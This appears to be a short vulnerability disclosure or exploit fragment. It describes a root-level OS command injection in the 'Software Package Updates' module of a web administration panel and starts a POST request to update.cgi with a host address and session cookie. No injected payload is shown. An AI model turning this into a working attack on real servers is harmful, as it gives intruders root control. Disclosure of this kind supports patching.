Access to the "Software Package Updates" module is required to trigger the vulnerability. Users with access to this module can run commands with root privileges on the system by performing OS Command Injection during a new package installation.
POST /package-updates/update.cgi HTTP/1.1
Host: 46.101.171.176:10000
Cookie: redirect=1; testing=1; sid=05ebaaec3707b0075c641325e9153608
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*